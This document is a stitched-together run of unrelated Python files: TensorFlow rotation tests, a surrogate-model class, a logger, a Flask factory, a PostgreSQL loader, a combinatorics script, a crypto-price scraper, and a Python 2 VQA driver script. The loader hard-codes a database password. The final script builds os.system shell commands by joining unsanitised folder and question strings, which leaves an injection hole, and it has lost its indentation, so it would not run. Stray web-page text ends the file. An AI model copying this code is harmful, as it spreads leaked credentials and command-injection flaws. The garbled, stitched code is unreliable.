            image,
            tf.random.uniform([8], -1, 1),
            output_shape=tf.constant([3, 5]))
        self.assertAllEqual([3, 5], result.shape)

    def _test_grad(self, shape_to_test):
        """Numerically check transform() gradients for one input shape."""
        with self.cached_session():
            test_image_shape = shape_to_test
            test_image = np.random.randn(*test_image_shape)
            test_image_tensor = tf.constant(test_image, shape=test_image_shape)
            test_transform = transform_ops.angles_to_projective_transforms(
                np.pi / 2, 4, 4)
            output_shape = test_image_shape
            output = transform_ops.transform(test_image_tensor, test_transform)
            left_err = gradient_checker.compute_gradient_error(
                test_image_tensor,
                test_image_shape,
                output,
                output_shape,
                x_init_value=test_image)
            self.assertLess(left_err, 1e-10)

    def _test_grad_different_shape(self, input_shape, output_shape):
        """Numerically check gradients when output_shape differs from the input."""
        with self.cached_session():
            test_image_shape = input_shape
            test_image = np.random.randn(*test_image_shape)
            test_image_tensor = tf.constant(test_image, shape=test_image_shape)
            test_transform = transform_ops.angles_to_projective_transforms(
                np.pi / 2, 4, 4)
            # Extract the (H, W) part of the requested output shape regardless
            # of whether it is 2-D, 3-D (HWC) or 4-D (NHWC).
            if len(output_shape) == 2:
                resize_shape = output_shape
            elif len(output_shape) == 3:
                resize_shape = output_shape[0:2]
            elif len(output_shape) == 4:
                resize_shape = output_shape[1:3]
            output = transform_ops.transform(
                images=test_image_tensor,
                transforms=test_transform,
                output_shape=resize_shape)
            left_err = gradient_checker.compute_gradient_error(
                test_image_tensor,
                test_image_shape,
                output,
                output_shape,
                x_init_value=test_image)
            self.assertLess(left_err, 1e-10)

    # TODO: switch to TF2 later.
    @test_utils.run_deprecated_v1
    def test_grad(self):
        """Gradient checks over 2-D, 3-D and 4-D inputs, same and resized outputs."""
        self._test_grad([16, 16])
        self._test_grad([4, 12, 12])
        self._test_grad([3, 4, 12, 12])
        self._test_grad_different_shape([16, 16], [8, 8])
        self._test_grad_different_shape([4, 12, 3], [8, 24, 3])
        self._test_grad_different_shape([3, 4, 12, 3], [3, 8, 24, 3])

    @test_utils.run_in_graph_and_eager_modes
    def test_transform_data_types(self):
        """transform() preserves each supported dtype end-to-end."""
        for dtype in _DTYPES:
            image = tf.constant([[1, 2], [3, 4]], dtype=dtype)
            self.assertAllEqual(
                np.array([[4, 4], [4, 4]]).astype(dtype.as_numpy_dtype()),
                transform_ops.transform(image, [1] * 8))

    @test_utils.run_in_graph_and_eager_modes
    def test_transform_eager(self):
        """transform() works on a plain float image in eager mode."""
        image = tf.constant([[1., 2.], [3., 4.]])
        self.assertAllEqual(
            np.array([[4, 4], [4, 4]]), transform_ops.transform(
                image, [1] * 8))
@test_utils.run_all_in_graph_and_eager_modes
class RotateOpTest(tf.test.TestCase):
    """Tests for transform_ops.rotate: zero images, exact nearest-neighbour
    rotations, bilinear interpolation, and static-shape behaviour."""

    def test_zeros(self):
        """Rotating an all-zero image gives zeros for every dtype/shape/angle."""
        for dtype in _DTYPES:
            for shape in [(5, 5), (24, 24), (2, 24, 24, 3)]:
                for angle in [0, 1, np.pi / 2.0]:
                    image = tf.zeros(shape, dtype)
                    self.assertAllEqual(
                        transform_ops.rotate(image, angle),
                        np.zeros(shape, dtype.as_numpy_dtype()))

    def test_rotate_even(self):
        """Batch-rotate an even-sized (6x6) image by 0, 45 and 90 degrees."""
        for dtype in _DTYPES:
            image = tf.reshape(tf.cast(tf.range(36), dtype), (6, 6))
            image_rep = tf.tile(image[None, :, :, None], [3, 1, 1, 1])
            angles = tf.constant([0.0, np.pi / 4.0, np.pi / 2.0], tf.float32)
            image_rotated = transform_ops.rotate(image_rep, angles)
            # yapf: disable
            self.assertAllEqual(
                image_rotated[:, :, :, 0],
                [[[0, 1, 2, 3, 4, 5],
                  [6, 7, 8, 9, 10, 11],
                  [12, 13, 14, 15, 16, 17],
                  [18, 19, 20, 21, 22, 23],
                  [24, 25, 26, 27, 28, 29],
                  [30, 31, 32, 33, 34, 35]],
                 [[0, 3, 4, 11, 17, 0],
                  [2, 3, 9, 16, 23, 23],
                  [1, 8, 15, 21, 22, 29],
                  [6, 13, 20, 21, 27, 34],
                  [12, 18, 19, 26, 33, 33],
                  [0, 18, 24, 31, 32, 0]],
                 [[5, 11, 17, 23, 29, 35],
                  [4, 10, 16, 22, 28, 34],
                  [3, 9, 15, 21, 27, 33],
                  [2, 8, 14, 20, 26, 32],
                  [1, 7, 13, 19, 25, 31],
                  [0, 6, 12, 18, 24, 30]]])
            # yapf: enable

    def test_rotate_odd(self):
        """Batch-rotate an odd-sized (5x5) image by 45 deg, 1 rad and -90 deg."""
        for dtype in _DTYPES:
            image = tf.reshape(tf.cast(tf.range(25), dtype), (5, 5))
            image_rep = tf.tile(image[None, :, :, None], [3, 1, 1, 1])
            angles = tf.constant([np.pi / 4.0, 1.0, -np.pi / 2.0], tf.float32)
            image_rotated = transform_ops.rotate(image_rep, angles)
            # yapf: disable
            self.assertAllEqual(
                image_rotated[:, :, :, 0],
                [[[0, 3, 8, 9, 0],
                  [1, 7, 8, 13, 19],
                  [6, 6, 12, 18, 18],
                  [5, 11, 16, 17, 23],
                  [0, 15, 16, 21, 0]],
                 [[0, 3, 9, 14, 0],
                  [2, 7, 8, 13, 19],
                  [1, 6, 12, 18, 23],
                  [5, 11, 16, 17, 22],
                  [0, 10, 15, 21, 0]],
                 [[20, 15, 10, 5, 0],
                  [21, 16, 11, 6, 1],
                  [22, 17, 12, 7, 2],
                  [23, 18, 13, 8, 3],
                  [24, 19, 14, 9, 4]]])
            # yapf: enable

    def test_compose_rotate(self):
        """Same compose-then-transform check as ImageOpsTest.test_compose."""
        for dtype in _DTYPES:
            image = tf.constant(
                [[1, 1, 1, 0], [1, 0, 0, 0], [1, 1, 1, 0], [0, 0, 0, 0]],
                dtype=dtype)
            # Rotate counter-clockwise by pi / 2.
            rotation = transform_ops.angles_to_projective_transforms(
                np.pi / 2, 4, 4)
            # Translate right by 1 (the transformation matrix is always inverted,
            # hence the -1).
            translation = tf.constant([1, 0, -1, 0, 1, 0, 0, 0],
                                      dtype=tf.float32)
            composed = transform_ops.compose_transforms(rotation, translation)
            image_transformed = transform_ops.transform(image, composed)
            self.assertAllEqual(
                image_transformed,
                [[0, 0, 0, 0], [0, 1, 0, 1], [0, 1, 0, 1], [0, 1, 1, 1]])

    def test_bilinear(self):
        """Compare BILINEAR and NEAREST 45-degree rotations against scipy."""
        image = tf.constant(
            # yapf: disable
            [[0, 0, 0, 0, 0], [0, 1, 1, 1, 0], [0, 1, 0, 1, 0],
             [0, 1, 1, 1, 0], [0, 0, 0, 0, 0]],
            # yapf: enable
            tf.float32)
        # The following result matches:
        # >>> scipy.ndimage.rotate(image, 45, order=1, reshape=False)
        # which uses spline interpolation of order 1, equivalent to bilinear
        # interpolation.
        self.assertAllClose(
            transform_ops.rotate(image, np.pi / 4.0, interpolation="BILINEAR"),
            # yapf: disable
            [[0.000, 0.000, 0.343, 0.000, 0.000],
             [0.000, 0.586, 0.914, 0.586, 0.000],
             [0.343, 0.914, 0.000, 0.914, 0.343],
             [0.000, 0.586, 0.914, 0.586, 0.000],
             [0.000, 0.000, 0.343, 0.000, 0.000]],
            # yapf: enable
            atol=0.001)
        # yapf: disable
        self.assertAllClose(
            transform_ops.rotate(
                image, np.pi / 4.0, interpolation="NEAREST"),
            [[0, 0, 1, 0, 0],
             [0, 1, 1, 1, 0],
             [1, 1, 0, 1, 1],
             [0, 1, 1, 1, 0],
             [0, 0, 1, 0, 0]])
        # yapf: enable

    def test_bilinear_uint8(self):
        """Bilinear rotation of a uint8 image rounds to the expected bytes."""
        # yapf: disable
        image = tf.constant(
            np.asarray(
                [[0.0, 0.0, 0.0, 0.0, 0.0],
                 [0.0, 255, 255, 255, 0.0],
                 [0.0, 255, 0.0, 255, 0.0],
                 [0.0, 255, 255, 255, 0.0],
                 [0.0, 0.0, 0.0, 0.0, 0.0]],
                np.uint8),
            tf.uint8)
        # yapf: enable
        # == np.rint((expected image above) * 255)
        # yapf: disable
        self.assertAllEqual(
            transform_ops.rotate(image, np.pi / 4.0, interpolation="BILINEAR"),
            [[0.0, 0.0, 87., 0.0, 0.0], [0.0, 149, 233, 149, 0.0],
             [87., 233, 0.0, 233, 87.], [0.0, 149, 233, 149, 0.0],
             [0.0, 0.0, 87., 0.0, 0.0]])
        # yapf: enable

    def test_rotate_static_shape(self):
        """rotate() preserves the static shape even with a tensor angle."""
        image = tf.linalg.diag([1., 2., 3.])
        result = transform_ops.rotate(
            image, tf.random.uniform((), -1, 1), interpolation="BILINEAR")
        self.assertEqual(image.get_shape(), result.get_shape())
if __name__ == "__main__":
tf.test.main()
|
import time
import numpy as np
from ezmodel.core.transformation import NoNormalization
from ezmodel.util.misc import is_duplicate, at_least2d
class Model:
    """Base class for surrogate models.

    Wraps the subclass hooks ``_fit``/``_predict``/``_optimize`` with input
    normalisation, duplicate/NaN filtering, timing and error handling. The
    external interface (``fit``, ``predict``, attributes) is unchanged.
    """

    def __init__(self,
                 norm_X=NoNormalization(),
                 norm_y=NoNormalization(),
                 active_dims=None,
                 filter_nan_and_inf=True,
                 eliminate_duplicates=False,
                 eliminate_duplicates_eps=1e-16,
                 raise_exception_while_fitting=True,
                 raise_exception_while_prediction=True,
                 verbose=False,
                 **kwargs):
        """
        norm_X / norm_y: transformations applied to inputs / targets.
            NOTE(review): these default instances are created once at class
            definition and shared by every Model using the defaults — fine
            for a stateless NoNormalization, but pass fresh instances for
            stateful normalisers.
        active_dims: optional column indices of X to use.
        filter_nan_and_inf: drop rows containing NaN/inf in X or y.
        eliminate_duplicates: drop near-duplicate rows of X (eps tolerance).
        raise_exception_while_*: re-raise errors, or swallow them and return
            NaN/inf placeholders from predict().
        """
        self.norm_X = norm_X
        self.norm_y = norm_y
        self.eliminate_duplicates = eliminate_duplicates
        self.eliminate_duplicates_eps = eliminate_duplicates_eps
        self.active_dims = active_dims
        self.filter_nan_and_inf = filter_nan_and_inf
        self.verbose = verbose
        self.time = None               # seconds spent in the last fit()
        self.model = None              # subclass-managed underlying model
        self.X, self.y = None, None    # preprocessed training data
        self._X, self._y = None, None  # raw training data as passed to fit()
        self.success = None            # True/False after fit(); None before
        self.data = {}
        self.raise_exception_while_fitting = raise_exception_while_fitting
        self.raise_exception_while_prediction = raise_exception_while_prediction
        self.exception = None
        self.has_been_fitted = False

    def preprocess(self, X, y, **kwargs):
        """Apply column selection, filtering and normalisation to (X, y)."""
        if self.active_dims is not None:
            X = X[:, self.active_dims]
        if self.eliminate_duplicates:
            I = ~is_duplicate(X, eps=self.eliminate_duplicates_eps)
            X, y = X[I], y[I]
        if self.filter_nan_and_inf:
            # Keep only rows that are finite in both X and y.
            X_I = np.all(~np.isnan(X) & ~np.isinf(X), axis=1)
            y_I = np.all(~np.isnan(y) & ~np.isinf(y), axis=1)
            X, y = X[X_I & y_I], y[X_I & y_I]
        X, y = self.norm_X.forward(X), self.norm_y.forward(y)
        X, y = self._preprocess(X, y, **kwargs)
        return X, y

    def postprocess(self, out, **kwargs):
        """Denormalise predictions and run the subclass post-processing hook."""
        if "y" in out:
            out["y"] = self.norm_y.backward(out["y"])
        out = self._postprocess(out, **kwargs)
        return out

    def fit(self, X, y, **kwargs):
        """Fit the model on (X, y); returns self.

        Records timing and success state; re-raises fitting errors unless
        ``raise_exception_while_fitting`` is False.
        """
        X, y = at_least2d(X, expand="r"), at_least2d(y, expand="c")
        assert len(X) == len(y)
        self._X, self._y = X, y
        self.X, self.y = self.preprocess(X, y)
        start = time.time()
        try:
            # fit the model given the data
            self._fit(self.X, self.y, **kwargs)
            # do some parameter optimization if the model requires it
            self._optimize(**kwargs)
            # if no exception occurs set the model to be fitted successfully
            self.success = True
        except Exception as ex:
            self.success = False
            self.exception = ex
            if self.raise_exception_while_fitting:
                raise ex
        self.has_been_fitted = True
        self.time = time.time() - start
        return self

    def predict(self, X,
                return_values_of=None,
                return_as_dictionary=False,
                **kwargs):
        """Predict for X.

        Returns the values named in ``return_values_of`` (default ``["y"]``)
        as a dict, tuple or scalar. On a failed fit/prediction, returns
        NaN/inf placeholders unless configured to raise.
        """
        # FIX: avoid a mutable default argument (shared list across calls).
        if return_values_of is None:
            return_values_of = ["y"]
        if not self.success:
            if self.raise_exception_while_fitting:
                raise Exception("There was an error while fitting the model.")
            else:
                return np.full(len(X), np.nan)
        if self.active_dims is not None:
            X = X[:, self.active_dims]
        # normalize the input
        X = self.norm_X.forward(at_least2d(X, expand="r"))
        # write in the output dictionary what should be returned
        out = {}
        for k in return_values_of:
            out[k] = None
        try:
            # get the prediction from the actual implementation
            self._predict(X, out, **kwargs)
            # do the post processing of the outputs
            out = self.postprocess(out, **kwargs)
        except Exception as e:
            if self.raise_exception_while_prediction:
                raise e
            else:
                out["y"] = np.full(len(X), np.inf)
        if return_as_dictionary:
            return out
        else:
            ret = tuple([out[v] for v in return_values_of])
            return ret if len(ret) > 1 else ret[0]

    @classmethod
    def hyperparameters(cls):
        """Hyperparameter search space; empty for the base class."""
        return {}

    # ---- subclass hooks (no-ops in the base class) -------------------------
    def _preprocess(self, X, y, **kwargs):
        return X, y

    def _postprocess(self, out, **kwargs):
        return out

    def _fit(self, X, y, **kwargs):
        pass

    def _predict(self, X, out, **kwargs):
        pass

    def _optimize(self, **kwargs):
        pass
|
# -*- coding: utf-8 -*-
# A Survey on Negative Transfer
# https://github.com/chamwen/NT-Benchmark
import os.path as osp
from datetime import datetime
from datetime import timedelta, timezone
from utils.utils import create_folder
class LogRecord:
    """Creates and appends to a timestamped text log file for one run."""

    def __init__(self, args):
        """
        :param args: parsed argparse namespace; must carry result_dir, dset,
            method (and data_env/local_dir, used in log_init).
        """
        self.args = args
        self.result_dir = args.result_dir
        # NOTE(review): hard-coded to 'gpu', so the 'local' branch in
        # log_init is dead unless a caller overwrites this attribute.
        self.data_env = 'gpu'
        self.data_name = args.dset
        self.method = args.method

    def log_init(self):
        """Create the result folder, open the log file, write the args header."""
        create_folder(self.result_dir, self.args.data_env, self.args.local_dir)
        if self.data_env == 'local':
            # Beijing time (UTC+8). datetime.now(tz) replaces the deprecated
            # utcnow().replace(...).astimezone(...) chain with identical output.
            time_str = datetime.now(
                timezone(timedelta(hours=8), name='Asia/Shanghai')).strftime("%Y-%m-%d_%H_%M_%S")
        if self.data_env == 'gpu':
            # UTC timestamp for remote/GPU runs.
            time_str = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H_%M_%S")
        file_name_head = 'log_' + self.method + '_' + self.data_name + '_'
        self.args.out_file = open(osp.join(self.args.result_dir, file_name_head + time_str + '.txt'), 'w')
        self.args.out_file.write(self._print_args() + '\n')
        self.args.out_file.flush()
        return self.args

    def record(self, log_str):
        """Append one line to the open log file and flush immediately."""
        self.args.out_file.write(log_str + '\n')
        self.args.out_file.flush()
        return self.args

    def _print_args(self):
        """Render all argparse options as 'name:value' lines under a rule."""
        s = "==========================================\n"
        for arg, content in self.args.__dict__.items():
            s += "{}:{}\n".format(arg, content)
        return s
|
# -*- coding: utf-8 -*-
from flask import Flask
from flask_wtf.csrf import CSRFProtect
from config import config
# from vision import BoF
import for_html
# bof = BoF()
# instantiate for_html
# Shared extension singletons; each is bound to the app inside create_app().
for_html_real = for_html.for_html()
csrf = CSRFProtect()
def create_app(config_name):
    """Application factory: build the Flask app configured for config_name."""
    application = Flask(__name__)
    application.config.from_object(config[config_name])
    config[config_name].init_app(application)
    # Bind the shared module-level extensions to this app instance.
    for_html_real.init_app(application)
    csrf.init_app(application)
    # Register blueprints.
    from .main import main
    application.register_blueprint(main)
    return application
|
import psycopg2.extras
import time
import csvMaker
# Module-level connection shared by every function below.
# WARNING: credentials are hard-coded in source; move them to environment
# variables or a config file for anything beyond local experimentation.
connection = psycopg2.connect(
    host="localhost",
    port="5432",
    database="project1",
    user="dgy",
    password='xtny38206',
)
# autocommit so the ALTER TABLE / COPY statements below take effect immediately.
connection.autocommit = True
cursor = connection.cursor()
def pre_process(file_name):
    """Bulk-load all CSV buffers derived from file_name into their tables.

    csvMaker.make_contract_csv splits the source file into one file-like
    buffer per table; each table has its triggers disabled before COPY for
    speed. Per-table and total wall-clock timings are printed. Relies on
    the module-level `cursor` (autocommit is on, so no explicit commit).
    """
    start_time = time.time()
    (supply_center, client_enterprise, salesman,
     product, product_model, contract, contract_content) = \
        csvMaker.make_contract_csv(file_name)
    print("pre_process time is %s seconds ---" % (time.time() - start_time))
    time1 = time.time()
    # (buffer, table name, label used in the timing printout).
    # NOTE: the 'director' label for supply_center is kept verbatim from the
    # original output for compatibility.
    jobs = [
        (supply_center, 'supply_center', 'director'),
        (client_enterprise, 'client_enterprise', 'client_enterprise'),
        (salesman, 'salesman', 'salesman'),
        (product, 'product', 'product'),
        (product_model, 'product_model', 'product_model'),
        (contract, 'contract', 'contract'),
        (contract_content, 'contract_content', 'contract_content'),
    ]
    for buf, table, label in jobs:
        step_start = time.time()
        # Table names come from the hard-coded list above, not user input,
        # so string interpolation into SQL is safe here.
        cursor.execute("""alter table %s disable trigger ALL;""" % table)
        cursor.copy_from(buf, table, sep='|')
        print("%s time is %s seconds ---" % (label, time.time() - step_start))
    print("total import time is %s seconds ---" % (time.time() - time1))
def copy_from_test(file_name, table_name):
    """Load a CSV file into table_name via COPY, skipping its header row."""
    with open(file_name, 'r') as source:
        source.readline()  # discard the header line before COPY
        cursor.copy_from(source, table_name, sep=',')
        connection.commit()
# Driver: bulk-import the contract dataset and report total wall-clock time.
start = time.time()
# pre_process('data.csv')
pre_process('contract_info.csv')
end = time.time()
print('total time:'+str(end - start))
|
import itertools
import collections
import time
# Check to see if d1 matches d2, or any circular rotation of d2, or the
# reversal of any such rotation.
def foo(d1, d2):
    """Return True iff deque d1 equals some rotation (or reflected rotation) of d2.

    d2 is rotated in place while searching; when a reflected match is found
    it is returned still reversed (same side effect as the original code).
    """
    for _ in range(len(d1)):
        match = d1 == d2
        if not match:
            d2.reverse()
            match = d1 == d2
            if not match:
                d2.reverse()
        if match:
            return True
        d2.rotate()
    return False
# Check to see if vector x (or a rotation) is already in list c
# Check to see if vector x (or a rotation/reflection of it) is already in list c.
def new_row(c, x):
    """Return True iff x is not equivalent (under foo) to any deque in c."""
    return not any(foo(stored, x) for stored in c)
# Create a list of all possible n-tuples and only store the
# ones that have the correct number of digits
t1=time.time()
b=[]
for i in itertools.product([1,2,3,4,5],repeat=10):
    # Keep length-10 tuples with exactly two 1s, 2s, 3s and 4s; the two
    # remaining positions are therefore 5s.
    if i.count(1)==2 and i.count(2)==2 and i.count(3)==2 and i.count(4)==2:
        b.append(i)
t2=time.time()
print("Number of candidate solutions = ",len(b))
print("Setup time (secs) = ",t2-t1)
# Convert to deque for rapid comparisons
b=[collections.deque(i) for i in b]
c=[]
t1=time.time()
# Deduplicate candidates up to rotation and reflection using new_row/foo.
for n,i in enumerate(b):
    if n%1000 == 0:
        print("Progress = ",n," Solutions = ",len(c))
    if new_row(c,i):
        c.append(i)
t2=time.time()
print("Number of solutions = ",len(c))
print("Solution time (secs) = ",t2-t1)
|
import csv
import requests
from bs4 import BeautifulSoup
import re
def get_html(url):
    """Fetch url over HTTP and return the response body as text."""
    response = requests.get(url)
    return response.text
def write_csv(data):
    """Append one coin record as a row to cmc.csv.

    Args:
        data: dict with 'name', 'url' and 'price' keys.
    """
    # newline='' is required by the csv module; without it the writer emits
    # spurious blank lines on Windows.
    with open('cmc.csv', 'a', newline='') as f:
        writer = csv.writer(f)
        writer.writerow((
            data['name'],
            data['url'],
            data['price'],
        ))
def get_page_data(html):
    """Parse one coinmarketcap listing page and write each coin to cmc.csv.

    Returns:
        The relative URL of the next page, or False when no 'Next' link exists.
    """
    soup = BeautifulSoup(html, 'lxml')
    trs = soup.find_all('tr', class_='cmc-table-row')
    for tr in trs:
        name = tr.find('div', class_='cmc-table__column-name').find('a').text
        url = 'https://coinmarketcap.com' + tr.find('div', class_='cmc-table__column-name').find('a').get('href')
        price = tr.find('td', class_='cmc-table__cell--sort-by__price').find('a').text.replace('$', '').replace(',','')
        data = {
            'name': name,
            'url': url,
            'price': price
        }
        write_csv(data)
    try:
        next100 = soup.find('div', class_='cmc-table-listing__pagination').find('a', text=re.compile('Next')).get('href')
    except AttributeError:
        # find() returned None somewhere in the chain: no pagination block or
        # no 'Next' link, i.e. the last page was reached. (Was a bare except,
        # which also swallowed KeyboardInterrupt and real bugs.)
        print('Finish')
        return False
    return next100.strip('/')
def main():
    """Crawl coinmarketcap listing pages until no 'Next' link remains."""
    base_url = 'https://coinmarketcap.com/'
    next_page = '1'
    while next_page:  # follow 'Next' links until get_page_data returns False
        next_page = get_page_data(get_html(base_url + next_page))
        print(next_page)
    # Alternative: iterate a fixed page count instead of following links:
    # for i in range(27):
    #     get_page_data(get_html(base_url + str(i)))


if __name__ == '__main__':
    main()
|
import subprocess
import os
import sys
import os
import argparse
print "Downloading our Model"
os.system("cd model ; wget https://www.dropbox.com/s/szpt9smob7mk8s4/model_id.t7?dl=0")
parser = argparse.ArgumentParser()
parser.add_argument("-imf", "--image_folder", help="Folder containing the images")
parser.add_argument("-beam", "--beam_size", help="Beam search size for sampling questions from RNN/LSTM")
args = parser.parse_args()
image_folder = "../images/" if args.image_folder is None else args.image_folder
beam_size = 10 if args.beam_size is None else args.beam_size
#print image_folder
#print beam_size
os.system("cd questions ; rm questions.txt")
os.system("cd images ; rm images.txt")
os.system("cd neuraltalk2 ; th eval.lua -model ../model/model_id.t7 -image_folder " + image_folder +" -sample_max 1 -beam_size "+ str(beam_size))
filenames = []
app_path = image_folder
with open("./images/images.txt","r") as read:
line = read.readlines()
filenames = line
filenames = [x.split("\n")[0].split("/")[-1] for x in filenames]
#print filenames
with open("./questions/questions.txt", 'r') as f:
questions = f.readlines()
questions = [x.split('/n')[0] for x in questions]
quest_file = {}
for i in range(0,len(filenames)):
quest_file[filenames[i]] = questions[i*5: i*5+5]
for key in quest_file:
file_name_str = "../answers/"+key.split(".jpg")[0]+".txt"
if True: # not os.path.isfile("./"+file_name_str):
# with open(file_name_str, 'w') as outfile:
for i in range(0,5):
#print "i : ", i
#os.system("cd ./VQA_Demo;")
arg2 = key
arg4 = quest_file[key][i]
#print arg2, " ", arg4
os.system("pwd ;")
#proc = subprocess.Popen(['python', './VQA_Demo/demo.py', '-image_file_name ./images/snow_man -question "here is man"'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
#print proc.communicate()[0]
#thread.spleep(100)
#print "answer"
os.system('cd VQA_Demo ; python demo.py -image_file_name '+app_path + arg2+' -question "'+arg4+'" >> '+file_name_str)
#print 'cd VQA_Demo ; python demo.py -image_file_name '+app_path + arg2+' -question "'+arg4+'" >> '+file_name_str
#sys.stdout = open(outfile, 'w')
#outfile.write(ret)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.